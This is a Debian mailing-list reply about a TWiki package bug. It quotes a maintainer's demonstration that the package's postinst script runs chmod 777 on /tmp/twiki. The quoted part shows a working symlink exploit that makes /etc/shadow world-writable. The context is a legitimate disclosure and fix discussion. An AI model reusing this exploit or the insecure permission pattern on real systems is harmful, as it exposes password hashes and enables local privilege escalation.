Steve, yes but your information is outdated. (although i'm embarrassed that we didn't also resolve it in the etch version :/)
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=444982 Found in versions 4.1.2-1, twiki/1:4.1.2-2 Fixed in version twiki/1:4.1.2-3 and so, it seems to me that we're ok for the version that is going into lenny - I'll close it as soon as i can find the docco for howto do that :/ Sven Steve Kemp wrote: > On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote: > >> I will have to assume that this report is indeed incorrect unless I hear >> otherwise. > > On my Debian Etch system: > > [EMAIL PROTECTED]:~$ apt-get source twiki > Reading package lists... Done > Building dependency tree... Done > Need to get 4304kB of source archives. > Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B] > Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB] > Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) > [39.3kB] > Fetched 4304kB in 7s (546kB/s) > gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D > gpg: Can't check signature: public key not found > dpkg-source: extracting twiki in twiki-4.0.5 > dpkg-source: unpacking twiki_4.0.5.orig.tar.gz > dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz > > [EMAIL PROTECTED]:~$ cd twiki-4.0.5/ > [EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst > if [ ! -e /tmp/twiki ]; then > mkdir /tmp/twiki > chmod 777 /tmp/twiki > chown $TWIKI_OWNER.www-data /tmp/twiki > [EMAIL PROTECTED]:~/twiki-4.0.5$ > > > So : > > 1. If /tmp/twiki doesn't exist it is made as a directory. > > 2. If it does exist its permissions are changed - unconditionally > > Let me exploit it: > > [EMAIL PROTECTED]:~$ > [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki > [EMAIL PROTECTED]:~$ sudo apt-get install twiki > Password: > Reading package lists... Done > Building dependency tree... Done > The following extra packages will be installed: > libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs > Suggested packages: > ... > ... > Setting up libtext-diff-perl (0.35-2) ... > Setting up rcs (5.7-18) ... > Setting up twiki (4.0.5-9.1) ... > Adding password for user TWikiGuest > Reloading web server config...3224 > > Now what happened? > > Nothing. The directory /tmp/twiki was created and my symlink wasn't > touched. So we look safe. But I'm not convinced. > > I know that I can coerce it into working: > > [EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki > [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki > [EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure > Reloading web server config...3224 > . > [EMAIL PROTECTED]:~$ ls -l /etc/shadow > -rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow > > I guess the difference is relating to the presence, or not, of > /var/lib/twiki/data ? > > Looks like merely installing the package wouldn't trigger this, > but an upgrade might. Or something like that ! > > Steve > -- -- Professional Wiki Innovation and Support Sven Dowideit - http://DistributedINFORMATION.com A WikiRing Partner - http://wikiring.com Public key - http://pgp.mit.edu:11371/pks/lookup?search=Sven+Dowideit&op=index&exact=on -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
